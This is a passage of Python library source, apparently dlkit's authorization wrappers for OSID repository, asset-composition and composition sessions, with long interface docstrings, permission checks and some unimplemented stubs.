raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.BinLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_repository(repository_id)
def get_repositories_by_ids(self, repository_ids=None):
"""Gets a ``RepositoryList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the
repositories specified in the ``Id`` list, in the order of the
list, including duplicates, or an error results if an ``Id`` in
the supplied list is not found or inaccessible. Otherwise,
inaccessible ``Repositories`` may be omitted from the list and
may present the elements in any order including returning a
unique set.
arg: repository_ids (osid.id.IdList): the list of ``Ids`` to
retrieve
return: (osid.repository.RepositoryList) - the returned
``Repository list``
raise: NotFound - an ``Id`` was not found
raise: NullArgument - ``repository_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.BinLookupSession.get_bins_by_ids_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_repositories_by_ids(repository_ids)
def get_repositories_by_genus_type(self, repository_genus_type=None):
"""Gets a ``RepositoryList`` corresponding to the given repository genus
``Type`` which does not include repositories of types derived from the
specified ``Type``.
In plenary mode, the returned list contains all known
repositories or an error results. Otherwise, the returned list
may contain only those repositories that are accessible through
this session.
arg: repository_genus_type (osid.type.Type): a repository
genus type
return: (osid.repository.RepositoryList) - the returned
``Repository list``
raise: NullArgument - ``repository_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
pass
def get_repositories_by_parent_genus_type(self, repository_genus_type=None):
"""Gets a ``RepositoryList`` corresponding to the given repository genus
``Type`` and include any additional repositories with genus types
derived from the specified ``Type``.
In plenary mode, the returned list contains all known
repositories or an error results. Otherwise, the returned list
may contain only those repositories that are accessible through
this session.
arg: repository_genus_type (osid.type.Type): a repository
genus type
return: (osid.repository.RepositoryList) - the returned
``Repository list``
raise: NullArgument - ``repository_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
pass
def get_repositories_by_record_type(self, repository_record_type=None):
"""Gets a ``RepositoryList`` containing the given repository record ``Type``.
In plenary mode, the returned list contains all known
repositories or an error results. Otherwise, the returned list
may contain only those repositories that are accessible through
this session.
arg: repository_record_type (osid.type.Type): a repository
record type
return: (osid.repository.RepositoryList) - the returned
``Repository list``
raise: NullArgument - ``repository_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
pass
def get_repositories_by_provider(self, resource_id=None):
"""Gets a ``RepositoryList`` from the given provider ````.
In plenary mode, the returned list contains all known
repositories or an error results. Otherwise, the returned list
may contain only those repositories that are accessible through
this session.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.repository.RepositoryList) - the returned
``Repository list``
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
pass
def get_repositories(self):
"""Gets all ``Repositories``.
In plenary mode, the returned list contains all known
repositories or an error results. Otherwise, the returned list
may contain only those repositories that are accessible through
this session.
return: (osid.repository.RepositoryList) - a list of
``Repositories``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.BinLookupSession.get_bins_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_repositories()
repositories = property(fget=get_repositories)
class RepositoryAdminSession(abc_repository_sessions.RepositoryAdminSession,
osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Repositories``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create a
``Repository,`` a ``RepositoryForm`` is requested using
``get_repository_form_for_create()`` specifying the desired record
``Types`` or none if no record ``Types`` are needed. The returned
``RepositoryForm`` will indicate that it is to be used with a create
operation and can be used to examine metdata or validate data prior
to creation. Once the ``RepositoryForm`` is submiited to a create
operation, it cannot be reused with another create operation unless
the first operation was unsuccessful. Each ``RepositoryForm``
corresponds to an attempted transaction.
For updates, ``RepositoryForms`` are requested to the ``Repository``
``Id`` that is to be updated using ``getRepositoryFormForUpdate()``.
Similarly, the ``RepositoryForm`` has metadata about the data that
can be updated and it can perform validation before submitting the
update. The ``RepositoryForm`` can only be used once for a
successful update and cannot be reused.
The delete operations delete ``Repositories``. This session includes
an ``Id`` aliasing mechanism to assign an external ``Id`` to an
internally assigned Id.
"""
def __init__(self, provider_session, authz_session, proxy=None):
osid_sessions.OsidSession.__init__(self, provider_session, authz_session, proxy)
self._qualifier_id = Id('authorization.Qualifier%3AROOT%40dlkit.mit.edu')
# This needs to be done right
self._id_namespace = 'repository.Repository'
def can_create_repositories(self):
"""Tests if this user can create ``Repositories``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known creating a
``Repository`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may not wish to offer
create operations to unauthorized users.
return: (boolean) - ``false`` if ``Repository`` creation is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_create_resources_template
return self._provider_session.can_create_repositories()
def can_create_repository_with_record_types(self, repository_record_types=None):
"""Tests if this user can create a single ``Repository`` using the desired
record types.
While ``RepositoryManager.getRepositoryRecordTypes()`` can be
used to examine which records are supported, this method tests
which record(s) are required for creating a specific
``Repository``. Providing an empty array tests if a
``Repository`` can be created with no records.
arg: repository_record_types (osid.type.Type[]): array of
repository record types
return: (boolean) - ``true`` if ``Repository`` creation using
the specified ``Types`` is supported, ``false``
otherwise
raise: NullArgument - ``repository_record_types`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types_template
return self._provider_session.can_create_repository_with_record_types(
repository_record_types)
def get_repository_form_for_create(self, repository_record_types=None):
"""Gets the repository form for creating new repositories.
A new form should be requested for each create transaction.
arg: repository_record_types (osid.type.Type[]): array of
repository record types
return: (osid.repository.RepositoryForm) - the repository form
raise: NullArgument - ``repository_record_types`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form for requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.BinAdminSession.get_bin_form_for_create_template
if not self._can('create'):
raise PermissionDenied()
else:
return self._provider_session.get_repository_form_for_create(repository_record_types)
def create_repository(self, repository_form=None):
"""Creates a new ``Repository``.
arg: repository_form (osid.repository.RepositoryForm): the
form for this ``Repository``
return: (osid.repository.Repository) - the new ``Repository``
raise: IllegalState - ``repository_form`` already used in a
create transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``repository_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``repository_form`` did not originate from
``get_repository_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.BinAdminSession.create_bin_template
if not self._can('create'):
raise PermissionDenied()
else:
return self._provider_session.create_repository(repository_form)
def can_update_repositories(self):
"""Tests if this user can update ``Repositories``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating a
``Repository`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may not wish to offer
update operations to unauthorized users.
return: (boolean) - ``false`` if ``Repository`` modification is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_create_resources_template
return self._provider_session.can_update_repositories()
def get_repository_form_for_update(self, repository_id=None):
"""Gets the repository form for updating an existing repository.
A new repository form should be requested for each update
transaction.
arg: repository_id (osid.id.Id): the ``Id`` of the
``Repository``
return: (osid.repository.RepositoryForm) - the repository form
raise: NotFound - ``repository_id`` is not found
raise: NullArgument - ``repository_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.BinAdminSession.get_bin_form_for_update_template
if not self._can('update'):
raise PermissionDenied()
else:
return self._provider_session.get_repository_form_for_update(repository_id)
def update_repository(self, repository_form=None):
"""Updates an existing repository.
arg: repository_form (osid.repository.RepositoryForm): the
form containing the elements to be updated
raise: IllegalState - ``repository_form`` already used in an
update transaction
raise: InvalidArgument - the form contains an invalid value
raise: NullArgument - ``repository_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``repository_form`` did not originate from
``get_repository_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.BinAdminSession.update_bin_template
if not self._can('update'):
raise PermissionDenied()
else:
return self._provider_session.update_repository(repository_form)
def can_delete_repositories(self):
"""Tests if this user can delete ``Repositories``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting a
``Repository`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may not wish to offer
delete operations to unauthorized users.
return: (boolean) - ``false`` if ``Repository`` deletion is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_create_resources_template
return self._provider_session.can_delete_repositories()
def delete_repository(self, repository_id=None):
"""Deletes a ``Repository``.
arg: repository_id (osid.id.Id): the ``Id`` of the
``Repository`` to remove
raise: NotFound - ``repository_id`` not found
raise: NullArgument - ``repository_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.BinAdminSession.delete_bin_template
if not self._can('delete'):
raise PermissionDenied()
else:
return self._provider_session.delete_repository(repository_id)
def can_manage_repository_aliases(self):
"""Tests if this user can manage ``Id`` aliases for repositories.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Repository`` aliasing is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
pass
def alias_repository(self, repository_id=None, alias_id=None):
"""Adds an ``Id`` to a ``Repository`` for the purpose of creating compatibility.
The primary ``Id`` of the ``Repository`` is determined by the
provider. The new ``Id`` is an alias to the primary ``Id``. If
the alias is a pointer to another repository, it is reassigned
to the given repository ``Id``.
arg: repository_id (osid.id.Id): the ``Id`` of a
``Repository``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is in use as a primary
``Id``
raise: NotFound - ``repository_id`` not found
raise: NullArgument - ``repository_id`` or ``alias_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.BinAdminSession.alias_bin_template
if not self._can('alias'):
raise PermissionDenied()
else:
return self._provider_session.alias_repository(repository_id)
class AssetCompositionSession(abc_repository_sessions.AssetCompositionSession, osid_sessions.OsidSession):
"""This session defines methods for looking up ``Asset`` to ``Composition`` mappings.
A ``Composition`` represents a collection of ``Assets``.
This lookup session defines several views:
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete result set or is an error
condition
* isolated repository view: All lookup methods in this session
operate, retrieve and pertain to asseta and compositions defined
explicitly in the current repository. Using an isolated view is
useful for managing compositions with the
CompositionAdminSession.
* federated repository view: All lookup methods in this session
operate, retrieve and pertain to all compositions and assets
defined in this repository and any other compositions implicitly
available in this repository through repository inheritence.
The methods ``use_federated_asset_composition_view()`` and
``use_isolated_asset_compositiont_view()`` behave as a radio group
and one should be selected before invoking any lookup methods.
"""
def get_repository_id(self):
"""Gets the ``Repository`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Repository Id`` associated with
this session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._provider_session.get_repository_id()
repository_id = property(fget=get_repository_id)
def get_repository(self):
"""Gets the ``Repository`` associated with this session.
return: (osid.repository.Repository) - the ``Repository``
associated with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._provider_session.get_repository()
repository = property(fget=get_repository)
def can_access_asset_compositions(self):
"""Tests if this user can perform composition lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise Unimplemented()
def use_comparative_asset_composition_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_comparative_resource_view
self._provider_session.use_comparative_asset_composition_view()
def use_plenary_asset_composition_view(self):
"""A complete view of the returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_plenary_resource_view
self._provider_session.use_plenary_asset_composition_view()
def use_federated_repository_view(self):
"""Federates the view for methods in this session.
A federated view will include compositions in repositories which
are children of this repository in the repository hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_federated_bin_view
self._provider_session.use_federated_repository_view()
def use_isolated_repository_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this repository only.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_isolated_bin_view
self._provider_session.use_isolated_repository_view()
@utilities.arguments_not_none
def get_composition_assets(self, composition_id):
"""Gets the list of assets mapped to the given ``Composition``.
arg: composition_id (osid.id.Id): ``Id`` of the
``Composition``
return: (osid.repository.AssetList) - list of assets
raise: NotFound - ``composition_id`` not found
raise: NullArgument - ``composition_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session.get_composition_assets(composition_id)
@utilities.arguments_not_none
def get_compositions_by_asset(self, asset_id):
"""Gets a list of compositions including the given asset.
arg: asset_id (osid.id.Id): ``Id`` of the ``Asset``
return: (osid.repository.CompositionList) - the returned
``Composition list``
raise: NotFound - ``asset_id`` is not found
raise: NullArgument - ``asset_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
self._provider_session.get_compositions_by_asset(asset_id)
class AssetCompositionDesignSession(abc_repository_sessions.AssetCompositionDesignSession, osid_sessions.OsidSession):
"""This session provides the means for adding assets to an asset composiiton.
The asset is identified inside a composition using its own Id. To
add the same asset to the composition, multiple compositions should
be used and placed at the same level in the ``Composition``
hierarchy.
"""
def get_repository_id(self):
"""Gets the ``Repository`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Repository Id`` associated with
this session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._provider_session.get_repository_id()
repository_id = property(fget=get_repository_id)
def get_repository(self):
"""Gets the ``Repository`` associated with this session.
return: (osid.repository.Repository) - the ``Repository``
associated with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._provider_session.get_repository()
repository = property(fget=get_repository)
def can_compose_assets(self):
"""Tests if this user can manage mapping of ``Assets`` to ``Compositions``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as an application hint that may opt not to offer composition
operations.
return: (boolean) - ``false`` if asset composiion is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return True
@utilities.arguments_not_none
def add_asset(self, asset_id, composition_id):
"""Appends an asset to a composition.
arg: asset_id (osid.id.Id): ``Id`` of the ``Asset``
arg: composition_id (osid.id.Id): ``Id`` of the
``Composition``
raise: AlreadyExists - ``asset_id`` already part
``composition_id``
raise: NotFound - ``asset_id`` or ``composition_id`` not found
raise: NullArgument - ``asset_id`` or ``composition_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization fauilure
*compliance: mandatory -- This method must be implemented.*
"""
self._provider_session.add_asset(self, asset_id, composition_id)
@utilities.arguments_not_none
def move_asset_ahead(self, asset_id, composition_id, reference_id):
"""Reorders assets in a composition by moving the specified asset in front of a reference asset.
arg: asset_id (osid.id.Id): ``Id`` of the ``Asset``
arg: composition_id (osid.id.Id): ``Id`` of the
``Composition``
arg: reference_id (osid.id.Id): ``Id`` of the reference
``Asset``
raise: NotFound - ``asset_id`` or ``reference_id`` ``not found
in composition_id``
raise: NullArgument - ``asset_id, reference_id`` or
``composition_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization fauilure
*compliance: mandatory -- This method must be implemented.*
"""
self._provider_session.move_asset_ahead(self, asset_id, composition_id, reference_id)
@utilities.arguments_not_none
def move_asset_behind(self, asset_id, composition_id, reference_id):
"""Reorders assets in a composition by moving the specified asset behind of a reference asset.
arg: asset_id (osid.id.Id): ``Id`` of the ``Asset``
arg: composition_id (osid.id.Id): ``Id`` of the
``Composition``
arg: reference_id (osid.id.Id): ``Id`` of the reference
``Asset``
raise: NotFound - ``asset_id`` or ``reference_id`` ``not found
in composition_id``
raise: NullArgument - ``asset_id, reference_id`` or
``composition_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization fauilure
*compliance: mandatory -- This method must be implemented.*
"""
self._provider_session.move_asset_behind(self, asset_id, composition_id, reference_id)
@utilities.arguments_not_none
def order_assets(self, asset_ids, composition_id):
"""Reorders a set of assets in a composition.
arg: asset_ids (osid.id.Id[]): ``Ids`` for a set of
``Assets``
arg: composition_id (osid.id.Id): ``Id`` of the
``Composition``
raise: NotFound - ``composition_id`` not found or, an
``asset_id`` not related to ``composition_id``
raise: NullArgument - ``instruction_ids`` or ``agenda_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
self._provider_session.order_assets(self, asset_ids, composition_id)
@utilities.arguments_not_none
def remove_asset(self, asset_id, composition_id):
"""Removes an ``Asset`` from a ``Composition``.
arg: asset_id (osid.id.Id): ``Id`` of the ``Asset``
arg: composition_id (osid.id.Id): ``Id`` of the
``Composition``
raise: NotFound - ``asset_id`` ``not found in composition_id``
raise: NullArgument - ``asset_id`` or ``composition_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization fauilure
*compliance: mandatory -- This method must be implemented.*
"""
self._provider_session.remove_asset(self, asset_id, composition_id)
class CompositionLookupSession(abc_repository_sessions.CompositionLookupSession, osid_sessions.OsidSession):
"""This session provides methods for retrieving ``Composition`` objects.
The ``Composition`` represents a collection of ``Assets``.
This session defines views that offer differing behaviors when
retrieving multiple objects.
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete and ordered result set or is
an error condition
* isolated repository view: All lookup methods in this session
operate, retrieve and pertain to compositions defined explicitly
in the current repository. Using an isolated view is useful for
managing compositions with the ``CompositionAdminSession.``
* federated repository view: All composition methods in this
session operate, retrieve and pertain to all compositions
defined in this repository and any other compositions implicitly
available in this repository through repository inheritence.
* active composition view: All composition lookup methods return
active compositions.
* any status composition view: Compositions of any active or
inactive status are returned from methods.
* sequestered composition viiew: All composition methods suppress
sequestered compositions.
* unsequestered composition view: All composition methods return
all compositions.
Generally, the comparative view should be used for most applications
as it permits operation even if there is data that cannot be
accessed. For example, a browsing application may only need to
examine the ``Composition`` it can access, without breaking
execution. However, an administrative application may require a
complete set of ``Composition`` objects to be returned.
Compositions may have an additional records indicated by their
respective record types. The record may not be accessed through a
cast of the ``Composition``.
"""
def get_repository_id(self):
"""Gets the ``Repository`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Repository Id`` associated with
this session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._provider_session.get_repository_id()
repository_id = property(fget=get_repository_id)
def get_repository(self):
"""Gets the ``Repository`` associated with this session.
return: (osid.repository.Repository) - the ``Repository``
associated with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._provider_session.get_repository()
repository = property(fget=get_repository)
def can_lookup_compositions(self):
"""Tests if this user can perform ``Composition`` lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.can_lookup_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def use_comparative_composition_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_comparative_resource_view
self._provider_session.use_comparative_composition_view()
def use_plenary_composition_view(self):
"""A complete view of the ``Composition`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_plenary_resource_view
self._provider_session.use_plenary_composition_view()
def use_federated_repository_view(self):
"""Federates the view for methods in this session.
A federated view will include compositions in repositories which
are children of this repository in the repository hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_federated_bin_view
self._provider_session.use_federated_repository_view()
def use_isolated_repository_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this repository only.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_isolated_bin_view
self._provider_session.use_isolated_repository_view()
def use_active_composition_view(self):
"""Only active compositions are returned by methods in this session.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session.use_active_composition_view()
def use_any_status_composition_view(self):
"""All active and inactive compositions are returned by methods in this session.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session.use_any_status_composition_view()
def use_sequestered_composition_view(self):
"""The methods in this session omit sequestered compositions.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session.use_sequestered_composition_view()
def use_unsequestered_composition_view(self):
"""The methods in this session return all compositions, including sequestered compositions.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session.use_unsequestered_composition_view()
@utilities.arguments_not_none
def get_composition(self, composition_id):
"""Gets the ``Composition`` specified by its ``Id``.
arg: composition_id (osid.id.Id): ``Id`` of the
``Composiiton``
return: (osid.repository.Composition) - the composition
raise: NotFound - ``composition_id`` not found
raise: NullArgument - ``composition_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resource
# NOTE: This implementation currently ignores plenary view
return self._provider_session.get_composition(composition_id)
@utilities.arguments_not_none
def get_compositions_by_ids(self, composition_ids):
"""Gets a ``CompositionList`` corresponding to the given ``IdList``.
arg: composition_ids (osid.id.IdList): the list of ``Ids`` to
retrieve
return: (osid.repository.CompositionList) - the returned
``Composition list``
raise: NotFound - an ``Id`` was not found
raise: NullArgument - ``composition_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_ids
# NOTE: This implementation currently ignores plenary view
return self._provider_session.get_compositions_by_ids(composition_ids)
@utilities.arguments_not_none
def get_compositions_by_genus_type(self, composition_genus_type):
"""Gets a ``CompositionList`` corresponding to the given composition genus ``Type`` which does not include compositions of types derived from the specified ``Type``.
arg: composition_genus_type (osid.type.Type): a composition
genus type
return: (osid.repository.CompositionList) - the returned
``Composition list``
raise: NullArgument - ``composition_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_genus_type
# NOTE: This implementation currently ignores plenary view
return self._provider_session.get_compositions_by_genus_type(composition_genus_type)
@utilities.arguments_not_none
def get_compositions_by_parent_genus_type(self, composition_genus_type):
"""Gets a ``CompositionList`` corresponding to the given composition genus ``Type`` and include any additional compositions with genus types derived from the specified ``Type``.
arg: composition_genus_type (osid.type.Type): a composition
genus type
return: (osid.repository.CompositionList) - the returned
``Composition list``
raise: NullArgument - ``composition_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type
return self._provider_session.get_compositions_by_parent_genus_type(composition_genus_type)
@utilities.arguments_not_none
def get_compositions_by_record_type(self, composition_record_type):
"""Gets a ``CompositionList`` containing the given composition record ``Type``.
arg: composition_record_type (osid.type.Type): a composition
record type
return: (osid.repository.CompositionList) - the returned
``Composition list``
raise: NullArgument - ``composition_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_record_type
# STILL NEED TO IMPLEMENT!!!
return self._provider_session.get_compositions_by_record_type(composition_record_type)
@utilities.arguments_not_none
def get_compositions_by_provider(self, resource_id):
"""Gets a ``CompositionList`` from the given provider ````.
In plenary mode, the returned list contains all known
compositions or an error results. Otherwise, the returned list
may contain only those compositions that are accessible through
this session.
In sequestered mode, no sequestered compositions are returned.
In unsequestered mode, all compositions are returned.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.repository.CompositionList) - the returned
``Composition list``
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return self._provider_session.get_compositions_by_provider(resource_id)
def get_compositions(self):
"""Gets all ``Compositions``.
return: (osid.repository.CompositionList) - a list of
``Compositions``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources
# NOTE: This implementation currently ignores plenary view
return self._provider_session.get_compositions()
compositions = property(fget=get_compositions)
class CompositionQuerySession(abc_repository_sessions.CompositionQuerySession, osid_sessions.OsidSession):
"""This session provides methods for searching among ``Composition`` objects.
The search query is constructed using the ``CompositionQuery``.
This session defines views that offer differing behaviors when
searching.
* federated repository view: searches include compositions in
repositories of which this repository is an ancestor in the
repository hierarchy
* isolated repository view: searches are restricted to subjects in
this repository
* sequestered composition viiew: All composition methods suppress
sequestered compositions.
* unsequestered composition view: All composition methods return
all compositions.
Compositions may have a query record indicated by their respective
record types. The query record is accessed via the
``CompositionQuery``.
"""
def get_repository_id(self):
"""Gets the ``Repository`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Repository Id`` associated with
this session
*compliance: mandatory -- This method must be implemented.*
"""
return self._provider_session.get_repository_id()
repository_id = property(fget=get_repository_id)
def get_repository(self):
"""Gets the ``Repository`` associated with this session.
return: (osid.repository.Repository) - the ``Repository``
associated with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return self._provider_session.get_repository()
repository = property(fget=get_repository)
def can_search_compositions(self):
"""Tests if this user can perform ``Composition`` searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
return: (boolean) - ``false`` if search methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return self._provider_session.can_search_compositions()
def use_federated_repository_view(self):
"""Federates the view for methods in this session.
A federated view will include compositions in repositories which
are children of this repository in the repository hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session.use_federated_repository_view()
def use_isolated_repository_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this repository only.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session._use_isolated_catalog_view()
def use_sequestered_composition_view(self):
"""The methods in this session omit sequestered compositions.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session.use_sequestered_composition_view()
def use_unsequestered_composition_view(self):
"""The methods in this session return all compositions, including sequestered compositions.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session.use_unsequestered_composition_view()
def get_composition_query(self):
"""Gets a composition query.
return: (osid.repository.CompositionQuery) - the composition
query
*compliance: mandatory -- This method must be implemented.*
"""
